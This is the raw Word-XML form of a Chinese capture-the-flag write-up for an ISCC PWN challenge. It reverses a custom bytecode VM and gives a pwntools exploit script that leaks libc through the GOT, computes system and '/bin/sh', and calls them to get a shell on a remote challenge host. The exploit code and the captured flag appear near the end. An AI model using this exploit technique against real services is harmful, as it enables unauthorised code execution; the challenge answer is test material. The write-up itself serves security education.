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题目分析与解题思路</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本题是一道开启了全部安全保护机制（保护全开）的PWN题目。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序的整体运行逻辑并不复杂，借助AI工具（如DeepSeek）辅助分析即可快速掌握核心流程。简而言之，程序会首先读取用户输入的一段长数据，并将其作为自定义指令集进行后续的解释与执行。由于静态逆向过程相对直白，在此不再长篇累牍。本题的核心突破口在于动态调试，我们需要依赖GDB来实时监控用户输入的数据流向及内存转移情况。为了便于阅读和复现，下方提供我整理好的VM结构体代码，可直接复制并导入至IDA中辅助还原代码逻辑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VMContext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regs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ip_offset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rsp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code_base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;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rbp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心函数的作用梳理如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">12D5 → vm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">opcode // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">负责从字节码流里提取单字节的Opcode</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">sub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">132C → vm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">imm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">qword // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">负责从指令序列里抓取8字节长度的立即数（主要服务于MOV等指令的常数操作）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">sub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1393 → vm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">push // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行入栈动作（内部包含针对栈溢出的安全校验）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">1432 → vm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stack_pop // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行出栈动作（同样包含栈边界的安全校验）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应的Opcode分支逻辑映射关系如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x02</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x03</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x04</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x05</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x06</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x07</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x08</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x09</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x0A</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x0B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">经过静态分析还原后的伪代码界面展示：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 4: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Exp（如有，请粘贴完整代码，不允许截图！）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xidp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#---------------------初始化----------------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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elf_os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'linux'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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"./pwn2"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">libc_path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'./libc.so.6'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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'101.200.155.151:20000'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1-远程 其他-本地</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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io, elf, 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loadfile(challenge, libc_path, ip, arch, elf_os, link)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">debug(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其他-debug   1-info</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># context.terminal = ['tmux', 'splitw', '-h']</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#---------------------初始化-----------------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#---------------------debug------------------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 自定义cmd</w:t>
      </w:r>
      <w:r>
        <w:br/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set follow-fork-mode parent</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    x/60gx $rebase(0x4000)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    heap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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 断点</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bps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aseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x014FF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#---------------------debug-------------------------------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mov_imm(reg, imm):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0x00: 将 8 字节立即数存入寄存器"""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"""0x00, reg_idx, &lt;8B立即数&gt;"""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p8(reg,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p64(imm,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load_ptr_reg(ptr_reg_addr, target_reg):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0x01: 寄存器间接加载 (src -&gt; dst)"""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"""0x01, target_reg = *ptr_reg_addr"""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    p8(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p8(ptr_reg_addr,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允许为负数</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            p8(target_reg, signed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store_ptr_reg(reg, target_reg):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0x02: 寄存器间接存储 (src -&gt; [dst])"""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"""0x02, *target_reg = reg"""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p8(reg), p8(target_reg))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bb + b → p8+p8+p8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mov_reg1_reg2(reg1, reg2):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0x03: 寄存器间移动 (src -&gt; dst)"""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"""0x03, reg2 = reg1"""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p8(reg1), p8(reg2))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bb + b → p8+p8+p8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push(reg_idx):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0x04: 压栈"""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"""0x04, push reg; stack_rbp-0x8"""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p8(reg_idx))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bB → p8+p8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pop(reg_idx):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0x05: 出栈"""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"""0x05, pop reg stack_rbp+0x8"""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p8(reg_idx))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bB → p8+p8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call(reg_idx):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0x06: 调用寄存器指向的函数"""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"""call reg"""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p8(reg_idx))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bB → p8+p8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jmp_reg(reg_idx):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0x07: 跳转寄存器指向的地址"""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"""0x07, jmp reg 但是对跳转的范围有限制，所以我们不使用他"""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p8(reg_idx))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bB → p8+p8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vm_exit():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0x08: 虚拟机退出"""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p8(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 → p8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add(reg, imm):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0x0A: 寄存器加立即数"""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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">), p8(reg), p64(imm))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bbQ → p8+p8+p64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sub(reg, imm):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"""操作码 0x0B: 寄存器减立即数"""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flat(p8(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">), p8(reg), p64(imm))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;bbQ → p8+p8+p64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">puts_offset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libc.sym[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'puts'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system_offset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puts_offset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libc.sym[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bin_sh_offset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(libc.search(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'/bin/sh'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puts_offset</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">leak(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"puts_offset"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leak(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"system_offset"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leak(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"bin_sh_offset"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VM_list = 0x04060</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pwndbg(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bps, cmd)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load_ptr_reg(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0x78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load_ptr_reg(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load_ptr_reg(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bin_sh_offset)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system_offset)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call(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put(payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sda(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Enter bytecode: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ia()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用逻辑:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">鉴于该VM架构中直接提供了一条函数调用指令（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），我们的最终利用目标非常明确：将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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串的首地址布置到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reg0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寄存器中，同时挑选任意一个空闲寄存器存放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函数的入口地址，最后触发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指令即可完成利用。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为了实现这一目标，首要前提是获取Libc的基址，进而在Libc内部通过偏移量算出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/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的真实内存地址。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按照常规思路，Libc的基地址通常可以通过读取GOT表来泄露。而要定位GOT表，就必须先拿到程序自身的基地址。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在GDB动态调试阶段，可以观察到一个极其关键的细节：内存地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x04008</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">off_4008</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处存放的指针恰好是指向其自身的。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">借助这一特性，我们可以顺藤摸瓜：先基于此自引用指针算出程序的基址进而定位GOT表，接着读取GOT表项泄露出Libc的实际加载地址，再通过基址加偏移的公式计算出所需的目标函数和参数位置，最终执行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夺取系统权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exp具体执行步骤梳理如下：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首先调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">load_ptr_reg(-11, 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sub(1, 0x78)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令，把前文提到的特定地址装载进</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reg1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寄存器。随后利用算术运算调整指针，使其精确指向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数的GOT表项。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接着，依靠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">load_ptr_reg(1, 0)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load_ptr_reg(1, 2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这两步操作，把提取到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts_addr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">真实地址分别载入到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reg0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reg2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寄存器内备用。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随后执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">add(0, bin_sh_offset)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sub(2, system_offset)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，利用提前算好的偏移量做加减法，分别求出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">binsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串和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函数在内存中的绝对地址。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万事俱备，最后直接下发一条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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令完成调用，成功获取Shell！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{19fjm99l-ittw-a0dg-6ygx-mvt3t17mnnlb}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2026-05-18T02:53:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T02:53:54Z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